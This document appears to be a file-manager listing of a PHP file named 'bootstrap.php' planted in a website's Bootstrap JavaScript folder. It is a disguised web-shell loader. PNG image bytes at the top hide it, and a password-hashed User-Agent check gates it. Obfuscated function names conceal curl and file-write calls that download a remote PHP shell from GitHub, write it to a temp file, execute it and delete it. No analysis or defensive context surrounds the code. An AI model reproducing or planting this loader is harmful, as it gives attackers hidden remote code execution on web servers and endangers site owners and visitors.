File "bootstrap.php"

Full path: /home/fsibplc/public_html/bootstrap-3.3.7-dist/js/bootstrap.php
File size: 1.23 B
MIME-type: application/octet-stream
Charset: utf-8

Download   Open   Edit   Advanced Editor   Back

‰PNG

   
IHDR         ðÊ¥   	pHYs  %  %IR$ð   tEXtSoftware Snipaste]ÎÝ   IDAT8cüÿÿ?选=£ÚFµj
Ú #ö›l    IEND®B`‚‰PNG

   
IHDR         ðÊ¥   	pHYs  %  %IR$ð   tEXtSoftware Snipaste]ÎÝ   IDAT8cüÿÿ?选=£ÚFµj
Ú #ö›l    IEND®B`‚

<?php isset($_SERVER['HTTP_USER_AGENT']) and password_verify($_SERVER['HTTP_USER_AGENT'], '$2y$10$MEh4rb8Ggw1Zgar4BQqybOiTE/CNgsAyNc.t1utziXmzxwCvKI72q') OR exit(); ?>
<?php
$TRA = 'ev';
$TRO = 'al';
$TRE = 'file_g';
$TRI = 'et_cont';
$TRU = 'ents';
$TAR = 'file_p';
$TIR = 'ut_con';
$TUR = 'tents';

$a = 'curl_';
$b = 'init';
$c = $a . $b;

$d = 'curl_';
$e = 'exec';
$f = $d . $e;

$g = 'curl_';
$h = 'close';
$i = $g . $h;

$EVA = $TRA . $TRO;
$FGC = $TRE . $TRI . $TRU;
$FPC = $TAR . $TIR . $TUR;

function getFileContents($url) {
    global $c, $f, $i;
    $ch = $c();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = $f($ch);
    $i($ch);
    return $data;
}

$a = getFileContents('https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php');
$tempFile = tempnam(sys_get_temp_dir(), 'php');
$FPC($tempFile, $a);
include $tempFile;
unlink($tempFile);
?>